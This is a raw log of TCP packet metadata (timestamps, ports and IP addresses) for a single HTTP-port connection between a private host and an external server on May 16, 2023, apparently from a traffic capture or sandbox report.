May 16, 2023 12:56:34.464226961 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464246035 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464263916 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464265108 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464277983 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464283943 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464293957 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464303970 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464318037 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464323044 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464334011 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464343071 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464359045 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464361906 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464381933 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464384079 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464399099 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464401007 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464415073 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464421034 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464432001 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464438915 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464454889 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464458942 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464468956 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464478016 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464490891 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464498043 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464507103 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464517117 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464533091 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464535952 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464546919 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464555025 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464569092 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464574099 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464585066 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464592934 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464607000 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464612007 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464622974 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464632034 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464649916 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464653969 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464663029 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464669943 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464679003 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464689016 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464704037 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464708090 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464719057 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464726925 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464740992 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464745998 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464762926 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464766979 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464777946 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464786053 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.464802980 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.464817047 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465501070 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465523958 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465544939 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465565920 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465585947 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465585947 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465606928 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465615034 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465615034 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465626001 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465642929 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465646982 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465657949 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465667009 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465673923 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465686083 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465706110 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465724945 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465727091 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465744972 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465749025 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465759039 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465764046 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465773106 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465784073 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465797901 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465804100 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465815067 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465823889 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465842962 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465861082 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465862989 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465877056 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465881109 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465893030 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465899944 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465909958 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465919018 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.465935946 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.465950966 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.470513105 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487268925 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487322092 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487340927 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487360954 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487380981 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487411022 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487431049 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487449884 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487449884 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487451077 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487468958 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487481117 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487488985 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487488985 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487505913 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487508059 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487519979 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487526894 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487535954 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487545967 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487562895 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487565994 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487579107 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487585068 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487593889 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487603903 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487618923 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487627983 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487647057 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487648964 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487665892 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487667084 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487683058 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487685919 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487698078 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487704992 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487715006 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487723112 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487739086 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487740993 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487752914 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487761021 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487775087 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487778902 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487793922 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487797022 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487809896 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487817049 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487826109 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487834930 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487853050 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487854004 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487867117 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487880945 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487894058 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487911940 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487931013 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487950087 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487953901 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487967968 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487971067 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.487987041 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.487988949 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488003016 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488004923 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488020897 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488023996 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488038063 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488043070 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488053083 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488061905 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488076925 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488080978 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488091946 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488100052 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488115072 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488120079 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488131046 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488137960 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488145113 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488157034 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488176107 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488178015 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488193989 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488195896 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.488208055 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488224030 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.488718033 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602344036 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602394104 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602413893 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602433920 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602452993 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602473021 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602488995 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602494955 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602514029 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602533102 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602534056 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602543116 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602552891 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602554083 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602571964 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602572918 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602588892 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602592945 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602605104 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602612019 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602621078 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602631092 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602649927 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602652073 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602668047 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602669001 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602684021 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602686882 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602698088 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602705956 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602722883 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602724075 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602736950 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602742910 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602752924 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602761030 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602777004 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602780104 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602792978 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602798939 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602814913 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602818012 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602833033 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602837086 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.602849960 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.602866888 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.604073048 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608603954 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608638048 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608656883 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608675957 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608695030 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608700037 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608712912 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608721972 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608731985 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608733892 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608752966 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608752966 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608771086 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608772993 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608792067 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608799934 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608810902 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608815908 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608830929 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608830929 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608848095 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608850956 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608864069 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608870029 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608882904 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608889103 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608902931 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608918905 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.608964920 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.608983040 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609003067 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609024048 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609040976 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609050035 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609070063 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609088898 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609107971 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609107971 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609127045 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609138966 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609158039 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609191895 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609210014 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609229088 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609247923 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609249115 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609266996 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609272003 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609285116 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609293938 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609311104 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609328985 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609334946 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609354019 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609371901 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609375954 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609390974 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609390974 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609405994 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609421968 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609453917 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609487057 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609489918 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609616995 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609652042 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609661102 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609687090 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609724045 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609735966 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609755039 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609755993 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609772921 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609776020 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609791994 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609795094 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609806061 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609813929 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609823942 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609843016 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609848022 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609883070 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609883070 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609901905 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609919071 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609920979 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609934092 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609940052 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609951973 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609958887 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609973907 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.609977961 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.609994888 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610008955 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610012054 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610047102 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610049009 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610080957 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610083103 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610101938 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610116005 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610121012 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610131979 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610155106 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610156059 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610174894 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610196114 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610205889 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610215902 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610227108 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:34.610234976 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610253096 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:34.610286951 CEST	49171	80	192.168.2.22	23.95.122.250
